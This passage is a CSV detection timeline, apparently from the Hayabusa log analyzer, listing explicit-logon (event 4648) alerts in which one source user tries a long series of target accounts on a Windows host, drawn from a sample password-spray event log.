| Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:02.115 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:03.191 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:04.272 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:05.348 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:06.426 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:07.478 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:08.564 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:09.668 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:10.717 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:11.809 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:12.857 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:13.904 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:14.972 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:16.050 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:17.129 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:18.186 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:19.254 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:20.329 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:21.401 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:22.487 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:23.577 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:24.660 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:25.732 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:26.794 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:27.863 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:28.925 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:29.993 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:31.050 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:32.142 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:33.206 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:34.265 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:35.340 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:36.403 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:37.453 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:38.533 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:39.613 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:40.691 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:41.769 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:42.852 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:43.922 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:44.998 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:46.080 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:47.159 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:48.237 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:49.314 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:50.388 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:51.455 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:52.532 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:53.613 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:54.668 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:55.714 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:56.768 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:57.850 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:58.920 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:00.029 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:01.113 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:02.172 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:03.238 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:04.300 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:05.378 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:06.439 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:07.513 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:08.581 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:09.674 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:10.754 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:11.843 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:12.917 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:13.987 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:15.045 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:16.136 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:17.201 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:18.302 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:19.372 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:20.450 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:21.552 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:22.656 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:23.749 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:24.832 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:25.919 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:26.998 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:28.103 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:29.187 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | 